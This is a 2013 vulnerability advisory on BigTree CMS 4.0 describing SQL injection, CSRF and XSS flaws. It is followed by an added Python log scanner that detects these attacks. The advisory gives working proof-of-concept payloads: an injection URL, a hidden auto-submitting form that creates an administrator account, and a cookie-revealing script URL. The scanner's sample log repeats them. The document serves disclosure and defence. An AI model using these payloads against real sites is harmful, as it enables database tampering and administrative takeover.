HTB23165: Multiple Vulnerabilities in BigTree CMS
High-Tech Bridge (www.htbridge.com), published 2013-07-17

CVSS2: 7.5 High (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL

EPSS: 0.004 Low (percentile 72.1%)

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BigTree CMS, which can be exploited to perform SQL injection, Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks. A remote attacker can add, modify or delete information in the application's database and gain complete control over the application.

  1. SQL Injection in BigTree CMS: CVE-2013-4879
    The vulnerability exists due to insufficient sanitisation of user-supplied data passed to the "/site/index.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in the application's database.
    The following PoC (Proof of Concept) code displays the version of the MySQL server:
    http://[host]/site/index.php/%27and%28select%201%20from%28select%20count%28*%29%2cconcat%28%28select%20concat%28version%28%29%29%29%2cfloor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27
    The SQL injection vulnerability was independently discovered by the vendor just before High-Tech Bridge Security Research Lab reported it.

  2. Cross-Site Request Forgery (CSRF) in BigTree CMS: CVE-2013-4881
    The vulnerability exists due to insufficient validation of the HTTP request origin. A remote attacker can create a malicious web page containing a CSRF exploit, trick a logged-in administrator into opening that page, and thereby create a new user with administrative privileges.
    The basic CSRF exploit below will create a new administrator "attacker" with password "password":
    <form action="http://[host]/site/index.php/admin/users/create/" method="post" name="main">
    <input type="hidden" name="email" value="[email protected]">
    <input type="hidden" name="password" value="password">
    <input type="hidden" name="level" value="1">
    <input type="hidden" name="name" value="attacker">
    <input type="hidden" name="company" value="company">
    <input type="submit" id="btn">
    </form>
    <script>
    document.main.submit();
    </script>

  3. Cross-Site Scripting (XSS) in BigTree CMS: CVE-2013-4880
    The vulnerability exists due to insufficient filtration of user-supplied data in the "module" HTTP GET parameter passed to the "/site/index.php/admin/developer/modules/views/add/" URL. A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
    The exploitation example below uses the "alert()" JavaScript function to display the administrator's cookies:
    http://[host]/site/index.php/admin/developer/modules/views/add/?module=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&table=1&title=dolfbnwl
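A defender reading the three findings above will usually want to know whether any of them has already been tried against a deployment. The script below is an added example, not part of the High-Tech Bridge advisory or of BigTree CMS: it sweeps web-server access log lines for the request shapes described in findings 1 to 3 (an SQL-laden path segment after /site/index.php, markup in the module parameter of the views/add page, and a POST to the admin user-creation handler whose Referer is missing or from another host). The log lines, the hostname cms.example.test and the Combined Log Format with a trailing Referer field are all constructed assumptions.

```python
"""Detection sweep for the three HTB23165 BigTree CMS findings over access logs.

Added example (not advisory or project code). Log format, hostname and the
sample lines are constructed assumptions for the demonstration.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Combined Log Format with a trailing quoted Referer (assumed layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)

SITE_HOST = "cms.example.test"  # assumed hostname of the protected CMS

# Fragments characteristic of the error-based injection in finding 1.
SQLI_TOKENS = ("select", "concat(", "information_schema", "group by", "floor(rand(")


def parse_line(line):
    """Return the log fields as a dict, or None for lines that do not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def check_sqli(rec):
    """CVE-2013-4879: a quote plus SQL keywords in the path after /site/index.php."""
    path = unquote_plus(urlsplit(rec["url"]).path).lower()
    if not path.startswith("/site/index.php/"):
        return None
    extra = path[len("/site/index.php"):]
    hits = [t for t in SQLI_TOKENS if t in extra]
    if "'" in extra and len(hits) >= 2:
        return "SQLi pattern in path (%s)" % ", ".join(hits)
    return None


def check_xss(rec):
    """CVE-2013-4880: markup in the 'module' parameter of the views/add page."""
    parts = urlsplit(rec["url"])
    if "/admin/developer/modules/views/add/" not in parts.path:
        return None
    for value in parse_qs(parts.query).get("module", []):
        # parse_qs already decodes once; decode again to catch double-encoding.
        decoded = unquote_plus(value).lower()
        if "<script" in decoded or '"><' in decoded or "onerror=" in decoded:
            return "XSS payload in module= parameter"
    return None


def check_csrf(rec):
    """CVE-2013-4881: POST to the user-creation handler without a same-site Referer."""
    if rec["method"] != "POST":
        return None
    if "/admin/users/create/" not in urlsplit(rec["url"]).path:
        return None
    referer = rec["referer"]
    ref_host = urlsplit(referer).hostname if referer and referer != "-" else None
    if ref_host != SITE_HOST:
        return "missing or cross-origin Referer on admin user creation (%s)" % referer
    return None


def scan(lines):
    """Run every check over every parsable line; return (client_ip, reason) pairs."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for check in (check_sqli, check_xss, check_csrf):
            reason = check(rec)
            if reason:
                findings.append((rec["ip"], reason))
    return findings


# Constructed sample log: the three advisory request shapes plus two benign lines.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Jul/2013:10:01:02 +0000] "GET /site/index.php/%27and%28select%201%20from%28select%20count%28*%29%2cconcat%28%28select%20concat%28version%28%29%29%29%2cfloor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27 HTTP/1.1" 500 512 "-"',
    '203.0.113.5 - - [17/Jul/2013:10:02:10 +0000] "GET /site/index.php/admin/developer/modules/views/add/?module=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&table=1&title=dolfbnwl HTTP/1.1" 200 2048 "-"',
    '198.51.100.7 - - [17/Jul/2013:10:03:30 +0000] "POST /site/index.php/admin/users/create/ HTTP/1.1" 302 0 "http://attacker.example/csrf.html"',
    '192.0.2.10 - - [17/Jul/2013:10:04:00 +0000] "POST /site/index.php/admin/users/create/ HTTP/1.1" 302 0 "http://cms.example.test/site/index.php/admin/users/add/"',
    '192.0.2.10 - - [17/Jul/2013:10:05:00 +0000] "GET /site/index.php/about-us/ HTTP/1.1" 200 4096 "-"',
]

if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(ip, reason)
```

The Referer heuristic in check_csrf is the weakest of the three: browsers and privacy extensions sometimes strip the header, so a missing Referer on a legitimate admin action will show up as a finding and should be triaged against the session rather than treated as proof. The durable fix on the application side is the usual one, a per-session anti-CSRF token checked on the create handler, with prepared statements and output encoding for the other two findings.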

Affected products (CPE)
Name: bigtree cms | Operator: le | Version: 4.0
